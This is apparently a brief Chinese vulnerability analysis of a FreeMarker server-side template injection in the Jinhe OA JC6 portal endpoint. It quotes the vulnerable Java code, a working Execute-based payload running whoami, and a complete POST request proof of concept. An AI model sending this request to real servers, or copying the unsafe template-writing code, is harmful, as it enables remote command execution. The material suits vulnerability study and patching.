金和OA JC6 FreeMarker模板注入漏洞简析

/jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action

FileOutputStream out = null;    try {      String sameName = this.uuid + ".ftl";      File file = new File(PortalTemplateUtil.TEMPLATE_TEMP_DIR);      if (!file.exists())        file.mkdirs();       out = new FileOutputStream(PortalTemplateUtil.TEMPLATE_TEMP_DIR + File.separator + sameName);      String code = this.request.getParameter("code");      code = URLDecoder.decode(code, "UTF-8");      code = code.replaceAll("&lt;", "<").replaceAll("&quot;", """).replaceAll("&#39;", "'").replaceAll("&gt;", ">").replaceAll("&nbsp;", " ").replaceAll("<br />", "").replaceAll("<p>", "").replaceAll("</p>", "").replaceAll("&amp;", "&");      byte[] b = code.getBytes();      out.write(b);      out.flush();      try {        if (out != null)          out.close();       } catch (IOException e) {        e.printStackTrace();      }

String sameName = this.uuid + ".ftl";File file = new File(PortalTemplateUtil.TEMPLATE_TEMP_DIR);if (!file.exists())file.mkdirs(); out = new FileOutputStream(PortalTemplateUtil.TEMPLATE_TEMP_DIR + File.separator + sameName);

String code = this.request.getParameter("code");code = code.replaceAll("&lt;", "<").replaceAll("&quot;", """).replaceAll("&#39;", "'").replaceAll("&gt;", ">").replaceAll("&nbsp;", " ").replaceAll("<br />", "").replaceAll("<p>", "").replaceAll("</p>", "").replaceAll("&amp;", "&");

byte[] b = code.getBytes();out.write(b);out.flush();

code=${"freemarker.template.utility.Execute"?new()("whoami")}

POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 0

moduId=1&code=${"freemarker.template.utility.Execute"?new()("whoami")}&uuid=1